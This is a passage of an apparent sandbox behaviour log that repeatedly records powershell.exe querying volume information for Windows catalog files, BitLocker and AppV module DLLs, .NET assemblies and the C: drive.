Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation |
|
